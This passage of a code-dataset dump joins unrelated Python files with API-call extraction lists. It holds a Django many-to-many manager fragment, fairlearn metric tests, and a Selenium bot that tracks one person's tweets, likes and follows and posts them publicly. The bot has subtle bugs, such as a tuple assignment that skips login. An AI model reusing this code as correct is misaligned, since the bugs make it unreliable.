'%s_id' % src_fname: self.pk,
ct_fname: t[0],
fk_fname: t[1]
}) for t in to_add
], \
rem_q & Q(**{
'%s_id' % src_fname: self.pk
})
def create_gm2m_related_manager(superclass=None, **kwargs):
"""
Dynamically create a manager class that only concerns an instance (source
or target)
"""
bases = [GM2MBaseManager]
if superclass is None:
# no superclass provided, the manager is a generic target model manager
bases.insert(0, GM2MBaseTgtManager)
else:
# superclass provided, the manager is a source model manager and also
# derives from superclass
bases.insert(0, GM2MBaseSrcManager)
bases.append(superclass)
# Django's Manager constructor sets model to None, we store it under the
# class's attribute '_model' and it is retrieved in __init__
kwargs['_model'] = kwargs.pop('model')
return type(Manager)('GM2MManager', tuple(bases), kwargs)
| [
"django.db.models.Q",
"django.db.router.db_for_read",
"django.db.router.db_for_write"
]
| [((3080, 3137), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (3099, 3137), False, 'from django.db import router\n'), ((3642, 3699), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (3661, 3699), False, 'from django.db import router\n'), ((4238, 4295), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (4257, 4295), False, 'from django.db import router\n'), ((4720, 4777), 'django.db.router.db_for_write', 'router.db_for_write', (['self.through'], {'instance': 'self.instance'}), '(self.through, instance=self.instance)\n', (4739, 4777), False, 'from django.db import router\n'), ((5611, 5614), 'django.db.models.Q', 'Q', ([], {}), '()\n', (5612, 5614), False, 'from django.db.models import Q, Manager\n'), ((8424, 8574), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id__in' % self.field_names['src']): [obj.pk for obj in objs],\n self.field_names['tgt_ct']: inst_ct, self.field_names['tgt_fk']: self.pk})\n", (8425, 8574), False, 'from django.db.models import Q, Manager\n'), ((11089, 11099), 'django.db.models.Q', 'Q', ([], {}), '(**query)\n', (11090, 11099), False, 'from django.db.models import Q, Manager\n'), ((13394, 13397), 'django.db.models.Q', 'Q', ([], {}), '()\n', (13395, 13397), False, 'from django.db.models import Q, Manager\n'), ((14986, 14989), 'django.db.models.Q', 'Q', ([], {}), '()\n', (14987, 14989), False, 'from django.db.models import Q, Manager\n'), ((1186, 1239), 'django.db.router.db_for_read', 'router.db_for_read', (['self.model'], {'instance': 'instances[0]'}), '(self.model, instance=instances[0])\n', (1204, 1239), False, 'from django.db import router\n'), ((9801, 9820), 'django.db.models.Q', 'Q', ([], {'pk__in': 'to_remove'}), '(pk__in=to_remove)\n', (9802, 9820), False, 'from django.db.models import Q, Manager\n'), ((13669, 13720), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id' % self.field_names['src']): self.pk})\n", (13670, 13720), False, 'from django.db.models import Q, Manager\n'), ((15107, 15148), 'django.db.models.Q', 'Q', ([], {}), '(**{ct_fname: val[0], fk_fname: val[1]})\n', (15108, 15148), False, 'from django.db.models import Q, Manager\n'), ((15423, 15460), 'django.db.models.Q', 'Q', ([], {}), "(**{('%s_id' % src_fname): self.pk})\n", (15424, 15460), False, 'from django.db.models import Q, Manager\n'), ((743, 810), 'django.db.router.db_for_read', 'router.db_for_read', (['self.instance.__class__'], {'instance': 'self.instance'}), '(self.instance.__class__, instance=self.instance)\n', (761, 810), False, 'from django.db import router\n')] |
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import logging
import coloredlogs
import os
import pathlib
import time
import twitter as tt
from utils import retry
from fetch_likes import get_user_likes, login
from conf.settings import USER_ID, USERNAME, PASSWORD
CURR_PATH = pathlib.Path(__file__).parent.absolute()
TWEETS_FOLDER = os.path.join(CURR_PATH, 'screenshots')
LIKED_FOLDER = os.path.join(CURR_PATH, 'screenshots', 'liked')
class TwitterListener():
def __init__(self, user_id=USER_ID, search_base=40):
# Configure log
coloredlogs.install()
logging.basicConfig()
self.logger = logging.getLogger('TwitterListener')
self.logger.setLevel(logging.DEBUG)
# Set chrome options
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument("--no-sandbox")
self.driver = webdriver.Chrome(options=chrome_options)
# Create formatter, file handler and add they to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('twitter.log')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
self.search_base = search_base
self.user_id = user_id
self.target = tt.get_username_from_id(user_id)
self.is_logged = False,
self.has_previous_tweets = False
self.has_previous_friends = False
self.has_previous_likes = False
def _get_new_tweets(self):
if(not self.has_previous_tweets):
self.previous_tweets_ids = tt.get_ids_from_tweets(
tt.get_tweets(user_id=self.user_id, count=self.search_base))
self.has_previous_tweets = True
last_tweets = tt.get_tweets(user_id=self.user_id,
count=self.search_base)
last_tweets_ids = tt.get_ids_from_tweets(last_tweets)
diff_tweets = self._get_new_diff(
last_tweets_ids, self.previous_tweets_ids)
if diff_tweets:
new_tweets = [last_tweets[i] for i in range(len(diff_tweets))]
self.previous_tweets_ids = last_tweets_ids
new_tweets.reverse()
return new_tweets
return []
def _get_new_likes(self):
count = self.search_base/2
if(not self.is_logged):
login(self.driver, USERNAME, PASSWORD)
self.is_logged = True
if(not self.has_previous_likes):
self.previous_likes_ids = get_user_likes(
self.driver, self.target, count=count)
self.has_previous_likes = True
new_likes_ids = get_user_likes(
self.driver, self.target, count=count)
diff_tweets = self._get_new_diff(
new_likes_ids, self.previous_likes_ids)
if diff_tweets:
self.previous_likes_ids = new_likes_ids
diff_tweets.reverse()
return diff_tweets
return []
def _get_new_diff(self, curr, old):
count = len(old)
return list(set(curr[:count//2]) -
set(old))
def _get_abs_diff(self, first_list, second_list):
return list(set(first_list) - set(second_list))
def print_new_tweets(self):
try:
new_tweets = self._get_new_tweets()
for tweet in new_tweets:
tweet_id = str(tweet['id'])
tweet_url = tt.get_url(tweet)
# Get image
self.logger.info('New tweet %s', tweet_url)
img_path = os.path.join(TWEETS_FOLDER, f'{tweet_id}.png')
retry(tt.print_tweet, tweet_url,
self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
tweet_msg = '<NAME> acabou de twittar'
self.logger.debug(
f'Is a retweet: {"retweeted_status" in tweet}')
if('retweeted_status' in tweet):
tweet_msg = '<NAME> acabou de retweetar'
tt.tweet_print(img_path, tweet_url, tweet_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def print_new_likes(self):
try:
new_likes = self._get_new_likes()
for t_id in new_likes:
t_url = f'https://twitter.com/{self.target}/status/{t_id}'
# Get image
self.logger.info('New like %s', t_url)
img_path = os.path.join(LIKED_FOLDER, f'{t_id}.png')
retry(tt.print_tweet, t_url, self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
t_msg = '<NAME> acabou de curtir esse tweet'
tt.tweet_print(img_path, t_url, t_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def watch_friends(self):
try:
if(not self.has_previous_friends):
self.previous_friends = tt.get_friends_ids(
user_id=self.user_id)
self.has_previous_friends = True
last_friends = tt.get_friends_ids()
new_friends = self._get_abs_diff(
last_friends, self.previous_friends)
unfriends = self._get_abs_diff(self.previous_friends, last_friends)
for user_id in new_friends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'New friend: @{username}')
retry(
tt.update_status,
status=(
f'<NAME> aparentemente está seguindo @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um follow ou por uma reativação de conta)'
)
)
for user_id in unfriends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'Unfriend: @{username}')
retry(
tt.update_status,
status=(
f'<NAME> aparentemente deixou de seguir @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um unfollow, suspensão ou block.)'
)
)
self.previous_friends = last_friends
except Exception as e:
self.logger.error(e)
| [
"logging.basicConfig",
"selenium.webdriver.chrome.options.Options",
"logging.getLogger",
"twitter.get_username_from_id",
"twitter.get_url",
"coloredlogs.install",
"twitter.get_tweets",
"pathlib.Path",
"selenium.webdriver.Chrome",
"logging.Formatter",
"os.path.join",
"fetch_likes.get_user_likes",
"fetch_likes.login",
"twitter.get_friends_ids",
"logging.FileHandler",
"twitter.get_ids_from_tweets",
"twitter.tweet_print",
"utils.retry"
]
| [((373, 411), 'os.path.join', 'os.path.join', (['CURR_PATH', '"""screenshots"""'], {}), "(CURR_PATH, 'screenshots')\n", (385, 411), False, 'import os\n'), ((427, 474), 'os.path.join', 'os.path.join', (['CURR_PATH', '"""screenshots"""', '"""liked"""'], {}), "(CURR_PATH, 'screenshots', 'liked')\n", (439, 474), False, 'import os\n'), ((591, 612), 'coloredlogs.install', 'coloredlogs.install', ([], {}), '()\n', (610, 612), False, 'import coloredlogs\n'), ((621, 642), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (640, 642), False, 'import logging\n'), ((665, 701), 'logging.getLogger', 'logging.getLogger', (['"""TwitterListener"""'], {}), "('TwitterListener')\n", (682, 701), False, 'import logging\n'), ((801, 810), 'selenium.webdriver.chrome.options.Options', 'Options', ([], {}), '()\n', (808, 810), False, 'from selenium.webdriver.chrome.options import Options\n'), ((935, 975), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'options': 'chrome_options'}), '(options=chrome_options)\n', (951, 975), False, 'from selenium import webdriver\n'), ((1066, 1139), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n", (1083, 1139), False, 'import logging\n'), ((1166, 1200), 'logging.FileHandler', 'logging.FileHandler', (['"""twitter.log"""'], {}), "('twitter.log')\n", (1185, 1200), False, 'import logging\n'), ((1364, 1396), 'twitter.get_username_from_id', 'tt.get_username_from_id', (['user_id'], {}), '(user_id)\n', (1387, 1396), True, 'import twitter as tt\n'), ((1834, 1893), 'twitter.get_tweets', 'tt.get_tweets', ([], {'user_id': 'self.user_id', 'count': 'self.search_base'}), '(user_id=self.user_id, count=self.search_base)\n', (1847, 1893), True, 'import twitter as tt\n'), ((1956, 1991), 'twitter.get_ids_from_tweets', 'tt.get_ids_from_tweets', (['last_tweets'], {}), '(last_tweets)\n', (1978, 1991), True, 'import twitter as tt\n'), ((2728, 2781), 'fetch_likes.get_user_likes', 'get_user_likes', (['self.driver', 'self.target'], {'count': 'count'}), '(self.driver, self.target, count=count)\n', (2742, 2781), False, 'from fetch_likes import get_user_likes, login\n'), ((316, 338), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (328, 338), False, 'import pathlib\n'), ((2437, 2475), 'fetch_likes.login', 'login', (['self.driver', 'USERNAME', 'PASSWORD'], {}), '(self.driver, USERNAME, PASSWORD)\n', (2442, 2475), False, 'from fetch_likes import get_user_likes, login\n'), ((2589, 2642), 'fetch_likes.get_user_likes', 'get_user_likes', (['self.driver', 'self.target'], {'count': 'count'}), '(self.driver, self.target, count=count)\n', (2603, 2642), False, 'from fetch_likes import get_user_likes, login\n'), ((5376, 5396), 'twitter.get_friends_ids', 'tt.get_friends_ids', ([], {}), '()\n', (5394, 5396), True, 'import twitter as tt\n'), ((1706, 1765), 'twitter.get_tweets', 'tt.get_tweets', ([], {'user_id': 'self.user_id', 'count': 'self.search_base'}), '(user_id=self.user_id, count=self.search_base)\n', (1719, 1765), True, 'import twitter as tt\n'), ((3503, 3520), 'twitter.get_url', 'tt.get_url', (['tweet'], {}), '(tweet)\n', (3513, 3520), True, 'import twitter as tt\n'), ((3637, 3683), 'os.path.join', 'os.path.join', (['TWEETS_FOLDER', 'f"""{tweet_id}.png"""'], {}), "(TWEETS_FOLDER, f'{tweet_id}.png')\n", (3649, 3683), False, 'import os\n'), ((3700, 3767), 'utils.retry', 'retry', (['tt.print_tweet', 'tweet_url', 'self.driver'], {'output_path': 'img_path'}), '(tt.print_tweet, tweet_url, self.driver, output_path=img_path)\n', (3705, 3767), False, 'from utils import retry\n'), ((4171, 4217), 'twitter.tweet_print', 'tt.tweet_print', (['img_path', 'tweet_url', 'tweet_msg'], {}), '(img_path, tweet_url, tweet_msg)\n', (4185, 4217), True, 'import twitter as tt\n'), ((4652, 4693), 'os.path.join', 'os.path.join', (['LIKED_FOLDER', 'f"""{t_id}.png"""'], {}), "(LIKED_FOLDER, f'{t_id}.png')\n", (4664, 4693), False, 'import os\n'), ((4710, 4773), 'utils.retry', 'retry', (['tt.print_tweet', 't_url', 'self.driver'], {'output_path': 'img_path'}), '(tt.print_tweet, t_url, self.driver, output_path=img_path)\n', (4715, 4773), False, 'from utils import retry\n'), ((4946, 4984), 'twitter.tweet_print', 'tt.tweet_print', (['img_path', 't_url', 't_msg'], {}), '(img_path, t_url, t_msg)\n', (4960, 4984), True, 'import twitter as tt\n'), ((5237, 5277), 'twitter.get_friends_ids', 'tt.get_friends_ids', ([], {'user_id': 'self.user_id'}), '(user_id=self.user_id)\n', (5255, 5277), True, 'import twitter as tt\n'), ((5645, 5685), 'twitter.get_username_from_id', 'tt.get_username_from_id', ([], {'user_id': 'user_id'}), '(user_id=user_id)\n', (5668, 5685), True, 'import twitter as tt\n'), ((5763, 5969), 'utils.retry', 'retry', (['tt.update_status'], {'status': 'f"""<NAME> aparentemente está seguindo @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um follow ou por uma reativação de conta)"""'}), '(tt.update_status, status=\n f"""<NAME> aparentemente está seguindo @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um follow ou por uma reativação de conta)"""\n )\n', (5768, 5969), False, 'from utils import retry\n'), ((6183, 6223), 'twitter.get_username_from_id', 'tt.get_username_from_id', ([], {'user_id': 'user_id'}), '(user_id=user_id)\n', (6206, 6223), True, 'import twitter as tt\n'), ((6299, 6500), 'utils.retry', 'retry', (['tt.update_status'], {'status': 'f"""<NAME> aparentemente deixou de seguir @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um unfollow, suspensão ou block.)"""'}), '(tt.update_status, status=\n f"""<NAME> aparentemente deixou de seguir @{username}.\n(Esse bot não consegue verificar se essa atualização foi gerada por um unfollow, suspensão ou block.)"""\n )\n', (6304, 6500), False, 'from utils import retry\n')] |
from runner import runner
if __name__ == '__main__':
r = runner()
p = 'public class main{public static void main (String[] args){' \
'public String StudentAnswer(String myInput){' \
'return "myOutput"; ' \
'}System.out.println("hello world!");}}'
print (r.sendCode(p, '')) | [
"runner.runner"
]
| [((62, 70), 'runner.runner', 'runner', ([], {}), '()\n', (68, 70), False, 'from runner import runner\n')] |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import pytest
import numpy as np
import sklearn.metrics as skm
import fairlearn.metrics as metrics
# ======================================================
a = "a"
b = "b"
c = "c"
Y_true = [0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_pred = [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
Y_true_ternary = [a, b, c, c, c, b, b, b, c, c, a, a, a, a, a, b, c, c]
Y_pred_ternary = [b, c, c, c, b, b, b, b, b, c, a, a, c, a, a, b, c, c]
groups = [3, 4, 1, 0, 0, 0, 3, 2, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
weight = [1, 2, 3, 1, 2, 3, 4, 2, 3, 3, 2, 1, 2, 3, 1, 2, 3, 4]
group2 = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# =======================================================
# Define as a dictionary so that the actual name can be seen
# when pytest builds the tests
supported_metrics_weighted = [(skm.accuracy_score, metrics.group_accuracy_score),
(skm.confusion_matrix, metrics.group_confusion_matrix),
(skm.zero_one_loss, metrics.group_zero_one_loss)]
# The following only work with binary data when called with their default arguments
supported_metrics_weighted_binary = [(skm.precision_score, metrics.group_precision_score),
(skm.recall_score, metrics.group_recall_score),
(skm.roc_auc_score, metrics.group_roc_auc_score),
(skm.mean_squared_error, metrics.group_mean_squared_error),
(skm.r2_score, metrics.group_r2_score)]
supported_metrics_weighted_binary = supported_metrics_weighted_binary + supported_metrics_weighted
metrics_no_sample_weights = [(skm.max_error, metrics.group_max_error),
(skm.mean_absolute_error, metrics.group_mean_absolute_error),
(skm.mean_squared_log_error, metrics.group_mean_squared_log_error),
(skm.median_absolute_error, metrics.group_median_absolute_error)]
supported_metrics_unweighted = metrics_no_sample_weights + supported_metrics_weighted_binary
# =======================================================
@pytest.mark.parametrize("func_tuple", supported_metrics_unweighted)
def test_metric_unweighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups)
# We don't really care about the numbers (sklearn is responsible)
# We just want to make sure we got a result
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted_binary)
def test_metric_weighted(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true, Y_pred, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true, Y_pred, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
@pytest.mark.parametrize("func_tuple", supported_metrics_weighted)
def test_metric_weighted_ternary(func_tuple):
metric_func = func_tuple[0]
group_metric_func = func_tuple[1]
result = group_metric_func(Y_true_ternary, Y_pred_ternary, groups, sample_weight=weight)
assert len(result.by_group) == 5
expected_overall = metric_func(Y_true_ternary, Y_pred_ternary, sample_weight=weight)
if isinstance(expected_overall, np.ndarray):
assert np.array_equal(expected_overall, result.overall)
else:
assert expected_overall == result.overall
# ======================================================================================
def test_group_accuracy_score_unnormalized():
result = metrics.group_accuracy_score(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.accuracy_score(Y_true, Y_pred, False)
assert result.overall == expected_overall
# ======================================================================================
def test_group_confusion_matrix_labels():
labels = [0, 4]
result = metrics.group_confusion_matrix(Y_true, Y_pred, groups, labels=labels)
expected_overall = skm.confusion_matrix(Y_true, Y_pred, labels=labels)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_precision_score_ternary():
result = metrics.group_precision_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.precision_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_precision_score_pos_label():
result = metrics.group_precision_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.precision_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_recall_score_ternary():
result = metrics.group_recall_score(Y_true_ternary, Y_pred_ternary, group2, average=None)
expected_overall = skm.recall_score(Y_true_ternary, Y_pred_ternary, average=None)
assert np.array_equal(result.overall, expected_overall)
def test_group_recall_score_pos_label():
result = metrics.group_recall_score(Y_true, Y_pred, groups, pos_label=0)
expected_overall = skm.recall_score(Y_true, Y_pred, pos_label=0)
assert np.array_equal(result.overall, expected_overall)
# ======================================================================================
def test_group_roc_auc_score_average():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, average='samples')
expected_overall = skm.roc_auc_score(Y_true, Y_pred, average='samples')
assert expected_overall == result.overall
def test_group_roc_auc_score_max_fpr():
result = metrics.group_roc_auc_score(Y_true, Y_pred, groups, max_fpr=0.5)
expected_overall = skm.roc_auc_score(Y_true, Y_pred, max_fpr=0.5)
assert expected_overall == result.overall
# ======================================================================================
def test_group_zero_one_loss_unnormalized():
result = metrics.group_zero_one_loss(Y_true, Y_pred, groups, normalize=False)
expected_overall = skm.zero_one_loss(Y_true, Y_pred, False)
assert result.overall == expected_overall
# =============================================================================================
def test_group_mean_squared_error_multioutput_single_ndarray():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
# =============================================================================================
def test_group_r2_score_multioutput():
y_t = np.random.rand(len(groups), 2)
y_p = np.random.rand(len(groups), 2)
result = metrics.group_r2_score(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.r2_score(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
mask = np.asarray(groups) == target_group
expected = skm.r2_score(y_t[mask], y_p[mask], multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
# =============================================================================================
def test_group_mean_squared_error_multioutput_list_ndarray():
y_t = [np.random.rand(2) for x in groups]
y_p = [np.random.rand(2) for x in groups]
result = metrics.group_mean_squared_error(y_t, y_p, groups, multioutput='raw_values')
expected_overall = skm.mean_squared_error(y_t, y_p, multioutput='raw_values')
assert np.array_equal(result.overall, expected_overall)
for target_group in np.unique(groups):
y_true = []
y_pred = []
for i in range(len(groups)):
if groups[i] == target_group:
y_true.append(y_t[i])
y_pred.append(y_p[i])
expected = skm.mean_squared_error(y_true, y_pred, multioutput='raw_values')
assert np.array_equal(result.by_group[target_group], expected)
| [
"numpy.random.rand",
"sklearn.metrics.precision_score",
"sklearn.metrics.recall_score",
"sklearn.metrics.roc_auc_score",
"sklearn.metrics.r2_score",
"sklearn.metrics.zero_one_loss",
"fairlearn.metrics.group_accuracy_score",
"numpy.asarray",
"fairlearn.metrics.group_roc_auc_score",
"fairlearn.metrics.group_precision_score",
"fairlearn.metrics.group_mean_squared_error",
"sklearn.metrics.confusion_matrix",
"fairlearn.metrics.group_confusion_matrix",
"fairlearn.metrics.group_zero_one_loss",
"sklearn.metrics.mean_squared_error",
"fairlearn.metrics.group_r2_score",
"sklearn.metrics.accuracy_score",
"numpy.unique",
"pytest.mark.parametrize",
"numpy.array_equal",
"fairlearn.metrics.group_recall_score"
]
| [((2279, 2346), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_unweighted'], {}), "('func_tuple', supported_metrics_unweighted)\n", (2302, 2346), False, 'import pytest\n'), ((2896, 2968), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_weighted_binary'], {}), "('func_tuple', supported_metrics_weighted_binary)\n", (2919, 2968), False, 'import pytest\n'), ((3442, 3507), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""func_tuple"""', 'supported_metrics_weighted'], {}), "('func_tuple', supported_metrics_weighted)\n", (3465, 3507), False, 'import pytest\n'), ((4169, 4238), 'fairlearn.metrics.group_accuracy_score', 'metrics.group_accuracy_score', (['Y_true', 'Y_pred', 'groups'], {'normalize': '(False)'}), '(Y_true, Y_pred, groups, normalize=False)\n', (4197, 4238), True, 'import fairlearn.metrics as metrics\n'), ((4263, 4304), 'sklearn.metrics.accuracy_score', 'skm.accuracy_score', (['Y_true', 'Y_pred', '(False)'], {}), '(Y_true, Y_pred, False)\n', (4281, 4304), True, 'import sklearn.metrics as skm\n'), ((4520, 4589), 'fairlearn.metrics.group_confusion_matrix', 'metrics.group_confusion_matrix', (['Y_true', 'Y_pred', 'groups'], {'labels': 'labels'}), '(Y_true, Y_pred, groups, labels=labels)\n', (4550, 4589), True, 'import fairlearn.metrics as metrics\n'), ((4613, 4664), 'sklearn.metrics.confusion_matrix', 'skm.confusion_matrix', (['Y_true', 'Y_pred'], {'labels': 'labels'}), '(Y_true, Y_pred, labels=labels)\n', (4633, 4664), True, 'import sklearn.metrics as skm\n'), ((4677, 4725), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (4691, 4725), True, 'import numpy as np\n'), ((4873, 4960), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (['Y_true_ternary', 'Y_pred_ternary', 'group2'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, group2,\n average=None)\n', (4902, 4960), True, 'import fairlearn.metrics as metrics\n'), ((4980, 5045), 'sklearn.metrics.precision_score', 'skm.precision_score', (['Y_true_ternary', 'Y_pred_ternary'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, average=None)\n', (4999, 5045), True, 'import sklearn.metrics as skm\n'), ((5058, 5106), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5072, 5106), True, 'import numpy as np\n'), ((5166, 5232), 'fairlearn.metrics.group_precision_score', 'metrics.group_precision_score', (['Y_true', 'Y_pred', 'groups'], {'pos_label': '(0)'}), '(Y_true, Y_pred, groups, pos_label=0)\n', (5195, 5232), True, 'import fairlearn.metrics as metrics\n'), ((5256, 5304), 'sklearn.metrics.precision_score', 'skm.precision_score', (['Y_true', 'Y_pred'], {'pos_label': '(0)'}), '(Y_true, Y_pred, pos_label=0)\n', (5275, 5304), True, 'import sklearn.metrics as skm\n'), ((5317, 5365), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5331, 5365), True, 'import numpy as np\n'), ((5510, 5595), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (['Y_true_ternary', 'Y_pred_ternary', 'group2'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, group2, average=None\n )\n', (5536, 5595), True, 'import fairlearn.metrics as metrics\n'), ((5614, 5676), 'sklearn.metrics.recall_score', 'skm.recall_score', (['Y_true_ternary', 'Y_pred_ternary'], {'average': 'None'}), '(Y_true_ternary, Y_pred_ternary, average=None)\n', (5630, 5676), True, 'import sklearn.metrics as skm\n'), ((5689, 5737), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5703, 5737), True, 'import numpy as np\n'), ((5794, 5857), 'fairlearn.metrics.group_recall_score', 'metrics.group_recall_score', (['Y_true', 'Y_pred', 'groups'], {'pos_label': '(0)'}), '(Y_true, Y_pred, groups, pos_label=0)\n', (5820, 5857), True, 'import fairlearn.metrics as metrics\n'), ((5881, 5926), 'sklearn.metrics.recall_score', 'skm.recall_score', (['Y_true', 'Y_pred'], {'pos_label': '(0)'}), '(Y_true, Y_pred, pos_label=0)\n', (5897, 5926), True, 'import sklearn.metrics as skm\n'), ((5939, 5987), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (5953, 5987), True, 'import numpy as np\n'), ((6133, 6203), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (['Y_true', 'Y_pred', 'groups'], {'average': '"""samples"""'}), "(Y_true, Y_pred, groups, average='samples')\n", (6160, 6203), True, 'import fairlearn.metrics as metrics\n'), ((6227, 6279), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (['Y_true', 'Y_pred'], {'average': '"""samples"""'}), "(Y_true, Y_pred, average='samples')\n", (6244, 6279), True, 'import sklearn.metrics as skm\n'), ((6382, 6446), 'fairlearn.metrics.group_roc_auc_score', 'metrics.group_roc_auc_score', (['Y_true', 'Y_pred', 'groups'], {'max_fpr': '(0.5)'}), '(Y_true, Y_pred, groups, max_fpr=0.5)\n', (6409, 6446), True, 'import fairlearn.metrics as metrics\n'), ((6470, 6516), 'sklearn.metrics.roc_auc_score', 'skm.roc_auc_score', (['Y_true', 'Y_pred'], {'max_fpr': '(0.5)'}), '(Y_true, Y_pred, max_fpr=0.5)\n', (6487, 6516), True, 'import sklearn.metrics as skm\n'), ((6714, 6782), 'fairlearn.metrics.group_zero_one_loss', 'metrics.group_zero_one_loss', (['Y_true', 'Y_pred', 'groups'], {'normalize': '(False)'}), '(Y_true, Y_pred, groups, normalize=False)\n', (6741, 6782), True, 'import fairlearn.metrics as metrics\n'), ((6807, 6847), 'sklearn.metrics.zero_one_loss', 'skm.zero_one_loss', (['Y_true', 'Y_pred', '(False)'], {}), '(Y_true, Y_pred, False)\n', (6824, 6847), True, 'import sklearn.metrics as skm\n'), ((7153, 7229), 'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (7185, 7229), True, 'import fairlearn.metrics as metrics\n'), ((7254, 7312), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (7276, 7312), True, 'import sklearn.metrics as skm\n'), ((7325, 7373), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (7339, 7373), True, 'import numpy as np\n'), ((7607, 7673), 'fairlearn.metrics.group_r2_score', 'metrics.group_r2_score', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (7629, 7673), True, 'import fairlearn.metrics as metrics\n'), ((7698, 7746), 'sklearn.metrics.r2_score', 'skm.r2_score', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (7710, 7746), True, 'import sklearn.metrics as skm\n'), ((7759, 7807), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (7773, 7807), True, 'import numpy as np\n'), ((7832, 7849), 'numpy.unique', 'np.unique', (['groups'], {}), '(groups)\n', (7841, 7849), True, 'import numpy as np\n'), ((8318, 8394), 